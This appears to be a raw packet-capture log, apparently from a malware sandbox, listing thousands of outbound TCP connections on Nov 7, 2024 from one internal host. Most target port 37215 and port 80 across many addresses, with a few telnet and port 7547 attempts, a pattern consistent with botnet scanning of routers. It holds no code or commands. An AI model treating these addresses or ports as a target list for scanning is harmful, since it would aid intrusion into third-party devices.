                                          Nov 7, 2024 11:57:59.432034969 CET3044880192.168.2.132.94.106.102
                                          Nov 7, 2024 11:57:59.432041883 CET3044880192.168.2.132.91.182.128
                                          Nov 7, 2024 11:57:59.432048082 CET3044880192.168.2.132.56.158.136
                                          Nov 7, 2024 11:57:59.432059050 CET3044880192.168.2.132.151.178.33
                                          Nov 7, 2024 11:57:59.432065964 CET3044880192.168.2.132.112.44.9
                                          Nov 7, 2024 11:57:59.432070017 CET3044880192.168.2.132.93.86.106
                                          Nov 7, 2024 11:57:59.432076931 CET3044880192.168.2.132.197.15.225
                                          Nov 7, 2024 11:57:59.432101011 CET3044880192.168.2.132.174.253.128
                                          Nov 7, 2024 11:57:59.432116985 CET3044880192.168.2.132.229.219.77
                                          Nov 7, 2024 11:57:59.432120085 CET3044880192.168.2.132.164.87.74
                                          Nov 7, 2024 11:57:59.432120085 CET3044880192.168.2.132.152.184.62
                                          Nov 7, 2024 11:57:59.432132959 CET3044880192.168.2.132.110.207.241
                                          Nov 7, 2024 11:57:59.432137012 CET3044880192.168.2.132.125.217.4
                                          Nov 7, 2024 11:57:59.432137012 CET3044880192.168.2.132.76.90.37
                                          Nov 7, 2024 11:57:59.432137012 CET3044880192.168.2.132.79.117.145
                                          Nov 7, 2024 11:57:59.432147980 CET3044880192.168.2.132.1.255.149
                                          Nov 7, 2024 11:57:59.432161093 CET3044880192.168.2.132.101.190.145
                                          Nov 7, 2024 11:57:59.432161093 CET3044880192.168.2.132.74.127.11
                                          Nov 7, 2024 11:57:59.432190895 CET3721530704156.83.184.253192.168.2.13
                                          Nov 7, 2024 11:57:59.432193995 CET3044880192.168.2.132.57.142.40
                                          Nov 7, 2024 11:57:59.432194948 CET3044880192.168.2.132.85.56.169
                                          Nov 7, 2024 11:57:59.432202101 CET3721530704156.184.97.111192.168.2.13
                                          Nov 7, 2024 11:57:59.432204962 CET3044880192.168.2.132.204.64.249
                                          Nov 7, 2024 11:57:59.432204962 CET3044880192.168.2.132.172.239.195
                                          Nov 7, 2024 11:57:59.432210922 CET3044880192.168.2.132.239.204.127
                                          Nov 7, 2024 11:57:59.432213068 CET3721530704156.208.181.152192.168.2.13
                                          Nov 7, 2024 11:57:59.432224035 CET3044880192.168.2.132.106.104.238
                                          Nov 7, 2024 11:57:59.432229996 CET3721530704156.212.35.33192.168.2.13
                                          Nov 7, 2024 11:57:59.432238102 CET3044880192.168.2.132.12.242.244
                                          Nov 7, 2024 11:57:59.432238102 CET3070437215192.168.2.13156.83.184.253
                                          Nov 7, 2024 11:57:59.432238102 CET3044880192.168.2.132.71.127.188
                                          Nov 7, 2024 11:57:59.432244062 CET3044880192.168.2.132.165.90.222
                                          Nov 7, 2024 11:57:59.432240009 CET3721530704156.69.127.35192.168.2.13
                                          Nov 7, 2024 11:57:59.432245970 CET3070437215192.168.2.13156.208.181.152
                                          Nov 7, 2024 11:57:59.432249069 CET3070437215192.168.2.13156.184.97.111
                                          Nov 7, 2024 11:57:59.432260036 CET3721530704156.139.98.158192.168.2.13
                                          Nov 7, 2024 11:57:59.432266951 CET3044880192.168.2.132.214.141.154
                                          Nov 7, 2024 11:57:59.432269096 CET3044880192.168.2.132.93.131.96
                                          Nov 7, 2024 11:57:59.432269096 CET3070437215192.168.2.13156.212.35.33
                                          Nov 7, 2024 11:57:59.432279110 CET3721530704156.141.15.100192.168.2.13
                                          Nov 7, 2024 11:57:59.432281017 CET3044880192.168.2.132.10.147.188
                                          Nov 7, 2024 11:57:59.432281017 CET3070437215192.168.2.13156.69.127.35
                                          Nov 7, 2024 11:57:59.432281017 CET3044880192.168.2.132.148.120.243
                                          Nov 7, 2024 11:57:59.432288885 CET3721530704156.238.146.205192.168.2.13
                                          Nov 7, 2024 11:57:59.432288885 CET3070437215192.168.2.13156.139.98.158
                                          Nov 7, 2024 11:57:59.432301044 CET3721530704156.25.198.124192.168.2.13
                                          Nov 7, 2024 11:57:59.432311058 CET3721530704156.37.61.224192.168.2.13
                                          Nov 7, 2024 11:57:59.432313919 CET3070437215192.168.2.13156.141.15.100
                                          Nov 7, 2024 11:57:59.432322979 CET3044880192.168.2.132.70.156.92
                                          Nov 7, 2024 11:57:59.432322979 CET3044880192.168.2.132.236.136.167
                                          Nov 7, 2024 11:57:59.432329893 CET3044880192.168.2.132.192.197.188
                                          Nov 7, 2024 11:57:59.432331085 CET3044880192.168.2.132.43.197.227
                                          Nov 7, 2024 11:57:59.432329893 CET3070437215192.168.2.13156.238.146.205
                                          Nov 7, 2024 11:57:59.432337999 CET3070437215192.168.2.13156.25.198.124
                                          Nov 7, 2024 11:57:59.432343006 CET3044880192.168.2.132.30.117.254
                                          Nov 7, 2024 11:57:59.432349920 CET3070437215192.168.2.13156.37.61.224
                                          Nov 7, 2024 11:57:59.432367086 CET3044880192.168.2.132.156.70.73
                                          Nov 7, 2024 11:57:59.432368994 CET3044880192.168.2.132.130.215.199
                                          Nov 7, 2024 11:57:59.432377100 CET3044880192.168.2.132.15.90.40
                                          Nov 7, 2024 11:57:59.432380915 CET3044880192.168.2.132.224.132.247
                                          Nov 7, 2024 11:57:59.432380915 CET3044880192.168.2.132.175.30.81
                                          Nov 7, 2024 11:57:59.432390928 CET3044880192.168.2.132.154.191.216
                                          Nov 7, 2024 11:57:59.432395935 CET3044880192.168.2.132.23.13.246
                                          Nov 7, 2024 11:57:59.432406902 CET3044880192.168.2.132.196.5.170
                                          Nov 7, 2024 11:57:59.432411909 CET3044880192.168.2.132.82.42.37
                                          Nov 7, 2024 11:57:59.432419062 CET3044880192.168.2.132.91.56.93
                                          Nov 7, 2024 11:57:59.432421923 CET3721530704156.35.159.115192.168.2.13
                                          Nov 7, 2024 11:57:59.432424068 CET3044880192.168.2.132.230.187.184
                                          Nov 7, 2024 11:57:59.432425976 CET3044880192.168.2.132.254.198.29
                                          Nov 7, 2024 11:57:59.432435036 CET3721530704156.45.56.98192.168.2.13
                                          Nov 7, 2024 11:57:59.432436943 CET3044880192.168.2.132.161.222.4
                                          Nov 7, 2024 11:57:59.432445049 CET3044880192.168.2.132.112.155.82
                                          Nov 7, 2024 11:57:59.432447910 CET3721530704156.41.251.198192.168.2.13
                                          Nov 7, 2024 11:57:59.432452917 CET3070437215192.168.2.13156.35.159.115
                                          Nov 7, 2024 11:57:59.432460070 CET3721530704156.81.247.138192.168.2.13
                                          Nov 7, 2024 11:57:59.432461977 CET3044880192.168.2.132.246.127.79
                                          Nov 7, 2024 11:57:59.432463884 CET3044880192.168.2.132.117.16.156
                                          Nov 7, 2024 11:57:59.432470083 CET3070437215192.168.2.13156.41.251.198
                                          Nov 7, 2024 11:57:59.432476044 CET3070437215192.168.2.13156.45.56.98
                                          Nov 7, 2024 11:57:59.432478905 CET3721530704156.30.203.160192.168.2.13
                                          Nov 7, 2024 11:57:59.432488918 CET3721530704156.97.216.52192.168.2.13
                                          Nov 7, 2024 11:57:59.432492018 CET3070437215192.168.2.13156.81.247.138
                                          Nov 7, 2024 11:57:59.432513952 CET3721530704156.67.140.175192.168.2.13
                                          Nov 7, 2024 11:57:59.432522058 CET3044880192.168.2.132.118.254.78
                                          Nov 7, 2024 11:57:59.432523012 CET3044880192.168.2.132.221.184.74
                                          Nov 7, 2024 11:57:59.432523012 CET3044880192.168.2.132.98.199.32
                                          Nov 7, 2024 11:57:59.432524920 CET3721530704156.247.61.119192.168.2.13
                                          Nov 7, 2024 11:57:59.432524920 CET3070437215192.168.2.13156.30.203.160
                                          Nov 7, 2024 11:57:59.432524920 CET3044880192.168.2.132.56.124.13
                                          Nov 7, 2024 11:57:59.432534933 CET3721530704156.196.11.0192.168.2.13
                                          Nov 7, 2024 11:57:59.432535887 CET3044880192.168.2.132.118.10.83
                                          Nov 7, 2024 11:57:59.432537079 CET3044880192.168.2.132.138.191.18
                                          Nov 7, 2024 11:57:59.432539940 CET3070437215192.168.2.13156.97.216.52
                                          Nov 7, 2024 11:57:59.432539940 CET3070437215192.168.2.13156.67.140.175
                                          Nov 7, 2024 11:57:59.432545900 CET3044880192.168.2.132.228.33.186
                                          Nov 7, 2024 11:57:59.432547092 CET3721530704156.174.206.220192.168.2.13
                                          Nov 7, 2024 11:57:59.432558060 CET3721530704156.222.30.184192.168.2.13
                                          Nov 7, 2024 11:57:59.432563066 CET3070437215192.168.2.13156.247.61.119
                                          Nov 7, 2024 11:57:59.432563066 CET3044880192.168.2.132.164.63.162
                                          Nov 7, 2024 11:57:59.432566881 CET3721530704156.30.35.204192.168.2.13
                                          Nov 7, 2024 11:57:59.432578087 CET3721530704156.224.54.103192.168.2.13
                                          Nov 7, 2024 11:57:59.432579994 CET3044880192.168.2.132.51.221.162
                                          Nov 7, 2024 11:57:59.432579994 CET3044880192.168.2.132.132.112.232
                                          Nov 7, 2024 11:57:59.432579994 CET3070437215192.168.2.13156.196.11.0
                                          Nov 7, 2024 11:57:59.432579994 CET3044880192.168.2.132.203.198.76
                                          Nov 7, 2024 11:57:59.432579994 CET3044880192.168.2.132.174.9.246
                                          Nov 7, 2024 11:57:59.432580948 CET3044880192.168.2.132.119.128.204
                                          Nov 7, 2024 11:57:59.432586908 CET3044880192.168.2.132.46.24.113
                                          Nov 7, 2024 11:57:59.432586908 CET3044880192.168.2.132.211.138.142
                                          Nov 7, 2024 11:57:59.432588100 CET234479060.114.104.239192.168.2.13
                                          Nov 7, 2024 11:57:59.432590008 CET3044880192.168.2.132.14.239.19
                                          Nov 7, 2024 11:57:59.432596922 CET3070437215192.168.2.13156.222.30.184
                                          Nov 7, 2024 11:57:59.432596922 CET3044880192.168.2.132.18.237.39
                                          Nov 7, 2024 11:57:59.432600975 CET3721530704156.59.228.79192.168.2.13
                                          Nov 7, 2024 11:57:59.432600975 CET3070437215192.168.2.13156.174.206.220
                                          Nov 7, 2024 11:57:59.432602882 CET3044880192.168.2.132.8.137.21
                                          Nov 7, 2024 11:57:59.432604074 CET3070437215192.168.2.13156.30.35.204
                                          Nov 7, 2024 11:57:59.432600975 CET3044880192.168.2.132.252.253.208
                                          Nov 7, 2024 11:57:59.432604074 CET3044880192.168.2.132.139.136.108
                                          Nov 7, 2024 11:57:59.432609081 CET3044880192.168.2.132.202.64.230
                                          Nov 7, 2024 11:57:59.432610989 CET3070437215192.168.2.13156.224.54.103
                                          Nov 7, 2024 11:57:59.432611942 CET3721530704156.208.210.142192.168.2.13
                                          Nov 7, 2024 11:57:59.432612896 CET3044880192.168.2.132.135.115.58
                                          Nov 7, 2024 11:57:59.432612896 CET3044880192.168.2.132.61.111.63
                                          Nov 7, 2024 11:57:59.432621956 CET3721530704156.117.186.199192.168.2.13
                                          Nov 7, 2024 11:57:59.432632923 CET3721530704156.154.211.51192.168.2.13
                                          Nov 7, 2024 11:57:59.432636976 CET3070437215192.168.2.13156.59.228.79
                                          Nov 7, 2024 11:57:59.432636976 CET3070437215192.168.2.13156.208.210.142
                                          Nov 7, 2024 11:57:59.432661057 CET3070437215192.168.2.13156.154.211.51
                                          Nov 7, 2024 11:57:59.432677984 CET3070437215192.168.2.13156.117.186.199
                                          Nov 7, 2024 11:57:59.432681084 CET4479023192.168.2.1360.114.104.239
                                          Nov 7, 2024 11:57:59.432682037 CET3044880192.168.2.132.147.111.247
                                          Nov 7, 2024 11:57:59.432683945 CET3044880192.168.2.132.96.240.150
                                          Nov 7, 2024 11:57:59.432693958 CET3044880192.168.2.132.225.224.113
                                          Nov 7, 2024 11:57:59.432703972 CET3044880192.168.2.132.179.33.105
                                          Nov 7, 2024 11:57:59.432717085 CET3044880192.168.2.132.219.65.209
                                          Nov 7, 2024 11:57:59.432718992 CET3044880192.168.2.132.74.43.34
                                          Nov 7, 2024 11:57:59.432718992 CET3044880192.168.2.132.158.73.122
                                          Nov 7, 2024 11:57:59.432722092 CET3044880192.168.2.132.207.230.100
                                          Nov 7, 2024 11:57:59.432735920 CET3044880192.168.2.132.117.235.182
                                          Nov 7, 2024 11:57:59.432739019 CET3044880192.168.2.132.86.154.50
                                          Nov 7, 2024 11:57:59.432739019 CET3044880192.168.2.132.54.54.147
                                          Nov 7, 2024 11:57:59.432740927 CET3044880192.168.2.132.65.126.50
                                          Nov 7, 2024 11:57:59.432754993 CET3044880192.168.2.132.47.214.156
                                          Nov 7, 2024 11:57:59.432761908 CET3044880192.168.2.132.153.132.179
                                          Nov 7, 2024 11:57:59.432768106 CET3044880192.168.2.132.102.24.178
                                          Nov 7, 2024 11:57:59.432790995 CET3044880192.168.2.132.62.86.249
                                          Nov 7, 2024 11:57:59.432801008 CET3044880192.168.2.132.201.162.152
                                          Nov 7, 2024 11:57:59.432801962 CET3044880192.168.2.132.104.50.241
                                          Nov 7, 2024 11:57:59.432804108 CET3044880192.168.2.132.111.115.50
                                          Nov 7, 2024 11:57:59.432804108 CET3044880192.168.2.132.185.240.11
                                          Nov 7, 2024 11:57:59.432820082 CET3044880192.168.2.132.22.1.236
                                          Nov 7, 2024 11:57:59.432821989 CET3044880192.168.2.132.43.209.110
                                          Nov 7, 2024 11:57:59.433075905 CET3721530704156.93.47.247192.168.2.13
                                          Nov 7, 2024 11:57:59.433088064 CET3721530704156.183.212.165192.168.2.13
                                          Nov 7, 2024 11:57:59.433096886 CET3721530704156.139.173.142192.168.2.13
                                          Nov 7, 2024 11:57:59.433109045 CET3721530704156.241.76.124192.168.2.13
                                          Nov 7, 2024 11:57:59.433116913 CET3070437215192.168.2.13156.93.47.247
                                          Nov 7, 2024 11:57:59.433118105 CET3721530704156.113.114.179192.168.2.13
                                          Nov 7, 2024 11:57:59.433119059 CET3070437215192.168.2.13156.183.212.165
                                          Nov 7, 2024 11:57:59.433129072 CET3721530704156.160.5.74192.168.2.13
                                          Nov 7, 2024 11:57:59.433139086 CET3721530704156.213.142.143192.168.2.13
                                          Nov 7, 2024 11:57:59.433141947 CET3070437215192.168.2.13156.139.173.142
                                          Nov 7, 2024 11:57:59.433151007 CET3721530704156.76.37.254192.168.2.13
                                          Nov 7, 2024 11:57:59.433157921 CET3070437215192.168.2.13156.113.114.179
                                          Nov 7, 2024 11:57:59.433160067 CET3070437215192.168.2.13156.160.5.74
                                          Nov 7, 2024 11:57:59.433161020 CET3070437215192.168.2.13156.241.76.124
                                          Nov 7, 2024 11:57:59.433168888 CET3721530704156.115.136.106192.168.2.13
                                          Nov 7, 2024 11:57:59.433175087 CET3070437215192.168.2.13156.213.142.143
                                          Nov 7, 2024 11:57:59.433175087 CET3070437215192.168.2.13156.76.37.254
                                          Nov 7, 2024 11:57:59.433187008 CET3721530704156.222.209.51192.168.2.13
                                          Nov 7, 2024 11:57:59.433197975 CET3721530704156.96.135.156192.168.2.13
                                          Nov 7, 2024 11:57:59.433202028 CET3070437215192.168.2.13156.115.136.106
                                          Nov 7, 2024 11:57:59.433207989 CET3721530704156.71.46.212192.168.2.13
                                          Nov 7, 2024 11:57:59.433218956 CET3721530704156.31.35.55192.168.2.13
                                          Nov 7, 2024 11:57:59.433228970 CET3721530704156.214.48.6192.168.2.13
                                          Nov 7, 2024 11:57:59.433231115 CET3070437215192.168.2.13156.222.209.51
                                          Nov 7, 2024 11:57:59.433238029 CET3721530704156.86.250.107192.168.2.13
                                          Nov 7, 2024 11:57:59.433239937 CET3070437215192.168.2.13156.71.46.212
                                          Nov 7, 2024 11:57:59.433249950 CET3721530704156.146.27.141192.168.2.13
                                          Nov 7, 2024 11:57:59.433249950 CET3070437215192.168.2.13156.96.135.156
                                          Nov 7, 2024 11:57:59.433255911 CET3070437215192.168.2.13156.31.35.55
                                          Nov 7, 2024 11:57:59.433258057 CET3070437215192.168.2.13156.214.48.6
                                          Nov 7, 2024 11:57:59.433259964 CET3721530704156.80.84.175192.168.2.13
                                          Nov 7, 2024 11:57:59.433275938 CET367867547192.168.2.13102.191.171.160
                                          Nov 7, 2024 11:57:59.433275938 CET3070437215192.168.2.13156.86.250.107
                                          Nov 7, 2024 11:57:59.433296919 CET3070437215192.168.2.13156.80.84.175
                                          Nov 7, 2024 11:57:59.433306932 CET3070437215192.168.2.13156.146.27.141
                                          Nov 7, 2024 11:57:59.433335066 CET3721530704156.218.235.1192.168.2.13
                                          Nov 7, 2024 11:57:59.433346033 CET3721530704156.255.112.157192.168.2.13
                                          Nov 7, 2024 11:57:59.433353901 CET3721530704156.213.221.215192.168.2.13
                                          Nov 7, 2024 11:57:59.433363914 CET3721530704156.62.247.51192.168.2.13
                                          Nov 7, 2024 11:57:59.433373928 CET3721530704156.106.74.5192.168.2.13
                                          Nov 7, 2024 11:57:59.433377028 CET3070437215192.168.2.13156.218.235.1
                                          Nov 7, 2024 11:57:59.433378935 CET3721530704156.83.227.157192.168.2.13
                                          Nov 7, 2024 11:57:59.433381081 CET3070437215192.168.2.13156.213.221.215
                                          Nov 7, 2024 11:57:59.433381081 CET3070437215192.168.2.13156.255.112.157
                                          Nov 7, 2024 11:57:59.433384895 CET3721530704156.133.250.245192.168.2.13
                                          Nov 7, 2024 11:57:59.433396101 CET3721530704156.205.80.153192.168.2.13
                                          Nov 7, 2024 11:57:59.433407068 CET3721530704156.138.58.194192.168.2.13
                                          Nov 7, 2024 11:57:59.433415890 CET3070437215192.168.2.13156.106.74.5
                                          Nov 7, 2024 11:57:59.433417082 CET3721530704156.145.143.200192.168.2.13
                                          Nov 7, 2024 11:57:59.433420897 CET3070437215192.168.2.13156.133.250.245
                                          Nov 7, 2024 11:57:59.433420897 CET3070437215192.168.2.13156.205.80.153
                                          Nov 7, 2024 11:57:59.433428049 CET3721530704156.145.216.97192.168.2.13
                                          Nov 7, 2024 11:57:59.433430910 CET3070437215192.168.2.13156.62.247.51
                                          Nov 7, 2024 11:57:59.433430910 CET3070437215192.168.2.13156.83.227.157
                                          Nov 7, 2024 11:57:59.433432102 CET3070437215192.168.2.13156.138.58.194
                                          Nov 7, 2024 11:57:59.433442116 CET3070437215192.168.2.13156.145.143.200
                                          Nov 7, 2024 11:57:59.433460951 CET3070437215192.168.2.13156.145.216.97
                                          Nov 7, 2024 11:57:59.433868885 CET3721530704156.244.216.173192.168.2.13
                                          Nov 7, 2024 11:57:59.433878899 CET3721530704156.244.102.71192.168.2.13
                                          Nov 7, 2024 11:57:59.433888912 CET3721530704156.122.190.178192.168.2.13
                                          Nov 7, 2024 11:57:59.433892965 CET3639623192.168.2.13160.219.200.63
                                          Nov 7, 2024 11:57:59.433896065 CET3070437215192.168.2.13156.244.216.173
                                          Nov 7, 2024 11:57:59.433898926 CET3721530704156.228.132.186192.168.2.13
                                          Nov 7, 2024 11:57:59.433909893 CET3721530704156.55.20.101192.168.2.13
                                          Nov 7, 2024 11:57:59.433919907 CET3070437215192.168.2.13156.244.102.71
                                          Nov 7, 2024 11:57:59.433923960 CET3070437215192.168.2.13156.122.190.178
                                          Nov 7, 2024 11:57:59.433924913 CET3070437215192.168.2.13156.228.132.186
                                          Nov 7, 2024 11:57:59.433929920 CET3721530704156.55.7.190192.168.2.13
                                          Nov 7, 2024 11:57:59.433942080 CET3721530704156.130.22.223192.168.2.13
                                          Nov 7, 2024 11:57:59.433948040 CET3070437215192.168.2.13156.55.20.101
                                          Nov 7, 2024 11:57:59.433950901 CET3721530704156.152.161.200192.168.2.13
                                          Nov 7, 2024 11:57:59.433960915 CET3721530704156.183.205.19192.168.2.13
                                          Nov 7, 2024 11:57:59.433964014 CET3070437215192.168.2.13156.55.7.190
                                          Nov 7, 2024 11:57:59.433971882 CET3721530704156.34.92.209192.168.2.13
                                          Nov 7, 2024 11:57:59.433973074 CET3070437215192.168.2.13156.130.22.223
                                          Nov 7, 2024 11:57:59.433990955 CET3721530704156.148.175.20192.168.2.13
                                          Nov 7, 2024 11:57:59.434001923 CET3721530704156.238.182.114192.168.2.13
                                          Nov 7, 2024 11:57:59.434005022 CET3070437215192.168.2.13156.34.92.209
                                          Nov 7, 2024 11:57:59.434005976 CET3070437215192.168.2.13156.183.205.19
                                          Nov 7, 2024 11:57:59.434007883 CET3070437215192.168.2.13156.152.161.200
                                          Nov 7, 2024 11:57:59.434010029 CET3721530704156.217.211.29192.168.2.13
                                          Nov 7, 2024 11:57:59.434016943 CET3070437215192.168.2.13156.148.175.20
                                          Nov 7, 2024 11:57:59.434020996 CET3721530704156.88.71.22192.168.2.13
                                          Nov 7, 2024 11:57:59.434031010 CET3721530704156.166.26.2192.168.2.13
                                          Nov 7, 2024 11:57:59.434051991 CET3721530704156.137.28.195192.168.2.13
                                          Nov 7, 2024 11:57:59.434062004 CET3721530704156.68.141.132192.168.2.13
                                          Nov 7, 2024 11:57:59.434063911 CET3070437215192.168.2.13156.88.71.22
                                          Nov 7, 2024 11:57:59.434065104 CET3070437215192.168.2.13156.238.182.114
                                          Nov 7, 2024 11:57:59.434065104 CET3070437215192.168.2.13156.217.211.29
                                          Nov 7, 2024 11:57:59.434071064 CET3721530704156.6.6.195192.168.2.13
                                          Nov 7, 2024 11:57:59.434082031 CET3721530704156.77.143.8192.168.2.13
                                          Nov 7, 2024 11:57:59.434089899 CET3070437215192.168.2.13156.137.28.195
                                          Nov 7, 2024 11:57:59.434089899 CET3070437215192.168.2.13156.68.141.132
                                          Nov 7, 2024 11:57:59.434091091 CET3721530704156.210.141.165192.168.2.13
                                          Nov 7, 2024 11:57:59.434099913 CET3070437215192.168.2.13156.6.6.195
                                          Nov 7, 2024 11:57:59.434101105 CET3070437215192.168.2.13156.166.26.2
                                          Nov 7, 2024 11:57:59.434102058 CET3721530704156.116.104.102192.168.2.13
                                          Nov 7, 2024 11:57:59.434111118 CET3721530704156.251.88.36192.168.2.13
                                          Nov 7, 2024 11:57:59.434120893 CET3721530704156.214.38.141192.168.2.13
                                          Nov 7, 2024 11:57:59.434123993 CET3070437215192.168.2.13156.77.143.8
                                          Nov 7, 2024 11:57:59.434129953 CET3721530704156.23.188.238192.168.2.13
                                          Nov 7, 2024 11:57:59.434137106 CET3070437215192.168.2.13156.210.141.165
                                          Nov 7, 2024 11:57:59.434139013 CET3070437215192.168.2.13156.116.104.102
                                          Nov 7, 2024 11:57:59.434149027 CET3721530704156.248.194.206192.168.2.13
                                          Nov 7, 2024 11:57:59.434155941 CET3070437215192.168.2.13156.23.188.238
                                          Nov 7, 2024 11:57:59.434156895 CET3070437215192.168.2.13156.251.88.36
                                          Nov 7, 2024 11:57:59.434159040 CET3721530704156.232.40.18192.168.2.13
                                          Nov 7, 2024 11:57:59.434159994 CET3070437215192.168.2.13156.214.38.141
                                          Nov 7, 2024 11:57:59.434169054 CET3721530704156.16.133.124192.168.2.13
                                          Nov 7, 2024 11:57:59.434179068 CET3721530704156.146.249.139192.168.2.13
                                          Nov 7, 2024 11:57:59.434189081 CET3070437215192.168.2.13156.248.194.206
                                          Nov 7, 2024 11:57:59.434211016 CET3070437215192.168.2.13156.16.133.124
                                          Nov 7, 2024 11:57:59.434216022 CET3070437215192.168.2.13156.146.249.139
                                          Nov 7, 2024 11:57:59.434238911 CET3070437215192.168.2.13156.232.40.18
                                          Nov 7, 2024 11:57:59.434362888 CET4103480192.168.2.1337.195.202.171
                                          Nov 7, 2024 11:57:59.434514046 CET3721530704156.112.22.186192.168.2.13
                                          Nov 7, 2024 11:57:59.434545040 CET3070437215192.168.2.13156.112.22.186
                                          Nov 7, 2024 11:57:59.434627056 CET3721530704156.169.85.63192.168.2.13
                                          Nov 7, 2024 11:57:59.434643984 CET3721530704156.132.3.21192.168.2.13
                                          Nov 7, 2024 11:57:59.434653997 CET3721530704156.149.239.204192.168.2.13
                                          Nov 7, 2024 11:57:59.434663057 CET3721530704156.64.138.50192.168.2.13
                                          Nov 7, 2024 11:57:59.434668064 CET3070437215192.168.2.13156.169.85.63
                                          Nov 7, 2024 11:57:59.434673071 CET3721530704156.123.103.195192.168.2.13
                                          Nov 7, 2024 11:57:59.434685946 CET3721530704156.134.8.206192.168.2.13
                                          Nov 7, 2024 11:57:59.434686899 CET3070437215192.168.2.13156.132.3.21
                                          Nov 7, 2024 11:57:59.434686899 CET3070437215192.168.2.13156.64.138.50
                                          Nov 7, 2024 11:57:59.434688091 CET3070437215192.168.2.13156.149.239.204
                                          Nov 7, 2024 11:57:59.434699059 CET3721530704156.37.234.181192.168.2.13
                                          Nov 7, 2024 11:57:59.434705019 CET3070437215192.168.2.13156.123.103.195
                                          Nov 7, 2024 11:57:59.434710026 CET3721530704156.109.71.159192.168.2.13
                                          Nov 7, 2024 11:57:59.434736967 CET3070437215192.168.2.13156.37.234.181
                                          Nov 7, 2024 11:57:59.434736967 CET3070437215192.168.2.13156.134.8.206
                                          Nov 7, 2024 11:57:59.434736967 CET3070437215192.168.2.13156.109.71.159
                                          Nov 7, 2024 11:57:59.434775114 CET3721530704156.217.161.131192.168.2.13
                                          Nov 7, 2024 11:57:59.434784889 CET3721530704156.219.143.187192.168.2.13
                                          Nov 7, 2024 11:57:59.434788942 CET3721530704156.49.172.130192.168.2.13
                                          Nov 7, 2024 11:57:59.434798002 CET3721530704156.20.86.251192.168.2.13
                                          Nov 7, 2024 11:57:59.434808969 CET3721530704156.84.170.92192.168.2.13
                                          Nov 7, 2024 11:57:59.434818029 CET3721530704156.228.100.103192.168.2.13
                                          Nov 7, 2024 11:57:59.434818983 CET3070437215192.168.2.13156.217.161.131
                                          Nov 7, 2024 11:57:59.434823990 CET3070437215192.168.2.13156.49.172.130
                                          Nov 7, 2024 11:57:59.434823990 CET3070437215192.168.2.13156.219.143.187
                                          Nov 7, 2024 11:57:59.434824944 CET3070437215192.168.2.13156.20.86.251
                                          Nov 7, 2024 11:57:59.434828043 CET3721530704156.127.119.199192.168.2.13
                                          Nov 7, 2024 11:57:59.434839010 CET3721530704156.113.161.193192.168.2.13
                                          Nov 7, 2024 11:57:59.434848070 CET3721530704156.222.36.107192.168.2.13
                                          Nov 7, 2024 11:57:59.434858084 CET3721530704156.86.179.143192.168.2.13
                                          Nov 7, 2024 11:57:59.434859037 CET3070437215192.168.2.13156.127.119.199
                                          Nov 7, 2024 11:57:59.434870005 CET3721530704156.240.247.98192.168.2.13
                                          Nov 7, 2024 11:57:59.434870958 CET3070437215192.168.2.13156.113.161.193
                                          Nov 7, 2024 11:57:59.434878111 CET3070437215192.168.2.13156.222.36.107
                                          Nov 7, 2024 11:57:59.434880972 CET3721530704156.29.66.170192.168.2.13
                                          Nov 7, 2024 11:57:59.434890985 CET3721530704156.215.195.156192.168.2.13
                                          Nov 7, 2024 11:57:59.434891939 CET3070437215192.168.2.13156.86.179.143
                                          Nov 7, 2024 11:57:59.434899092 CET3070437215192.168.2.13156.84.170.92
                                          Nov 7, 2024 11:57:59.434900999 CET3721530704156.127.189.8192.168.2.13
                                          Nov 7, 2024 11:57:59.434901953 CET3070437215192.168.2.13156.240.247.98
                                          Nov 7, 2024 11:57:59.434901953 CET3070437215192.168.2.13156.228.100.103
                                          Nov 7, 2024 11:57:59.434911013 CET3721530704156.113.103.63192.168.2.13
                                          Nov 7, 2024 11:57:59.434919119 CET3070437215192.168.2.13156.29.66.170
                                          Nov 7, 2024 11:57:59.434921980 CET3721530704156.81.140.11192.168.2.13
                                          Nov 7, 2024 11:57:59.434927940 CET3070437215192.168.2.13156.215.195.156
                                          Nov 7, 2024 11:57:59.434927940 CET3070437215192.168.2.13156.127.189.8
                                          Nov 7, 2024 11:57:59.434932947 CET3721530704156.92.153.50192.168.2.13
                                          Nov 7, 2024 11:57:59.434945107 CET3721530704156.6.192.64192.168.2.13
                                          Nov 7, 2024 11:57:59.434956074 CET3721530704156.171.211.49192.168.2.13
                                          Nov 7, 2024 11:57:59.434956074 CET3070437215192.168.2.13156.81.140.11
                                          Nov 7, 2024 11:57:59.434971094 CET3070437215192.168.2.13156.113.103.63
                                          Nov 7, 2024 11:57:59.434973001 CET3070437215192.168.2.13156.92.153.50
                                          Nov 7, 2024 11:57:59.434982061 CET3070437215192.168.2.13156.171.211.49
                                          Nov 7, 2024 11:57:59.434983969 CET3070437215192.168.2.13156.6.192.64
                                          Nov 7, 2024 11:57:59.435311079 CET3721530704156.102.118.223192.168.2.13
                                          Nov 7, 2024 11:57:59.435328960 CET3721530704156.175.2.199192.168.2.13
                                          Nov 7, 2024 11:57:59.435338974 CET3721530704156.24.221.214192.168.2.13
                                          Nov 7, 2024 11:57:59.435348988 CET3721530704156.60.136.117192.168.2.13
                                          Nov 7, 2024 11:57:59.435355902 CET3070437215192.168.2.13156.175.2.199
                                          Nov 7, 2024 11:57:59.435357094 CET3070437215192.168.2.13156.102.118.223
                                          Nov 7, 2024 11:57:59.435359001 CET3721530704156.67.148.253192.168.2.13
                                          Nov 7, 2024 11:57:59.435401917 CET3070437215192.168.2.13156.67.148.253
                                          Nov 7, 2024 11:57:59.435410023 CET3070437215192.168.2.13156.60.136.117
                                          Nov 7, 2024 11:57:59.435410023 CET3070437215192.168.2.13156.24.221.214
                                          Nov 7, 2024 11:57:59.435437918 CET3721530704156.142.174.250192.168.2.13
                                          Nov 7, 2024 11:57:59.435448885 CET3721530704156.28.163.215192.168.2.13
                                          Nov 7, 2024 11:57:59.435458899 CET3721530704156.206.102.225192.168.2.13
                                          Nov 7, 2024 11:57:59.435468912 CET3721530704156.162.46.22192.168.2.13
                                          Nov 7, 2024 11:57:59.435478926 CET3721530704156.201.230.224192.168.2.13
                                          Nov 7, 2024 11:57:59.435482979 CET3070437215192.168.2.13156.28.163.215
                                          Nov 7, 2024 11:57:59.435488939 CET3070437215192.168.2.13156.142.174.250
                                          Nov 7, 2024 11:57:59.435488939 CET3721530704156.225.145.98192.168.2.13
                                          Nov 7, 2024 11:57:59.435488939 CET3070437215192.168.2.13156.206.102.225
                                          Nov 7, 2024 11:57:59.435501099 CET3721530704156.227.229.251192.168.2.13
                                          Nov 7, 2024 11:57:59.435502052 CET3070437215192.168.2.13156.201.230.224
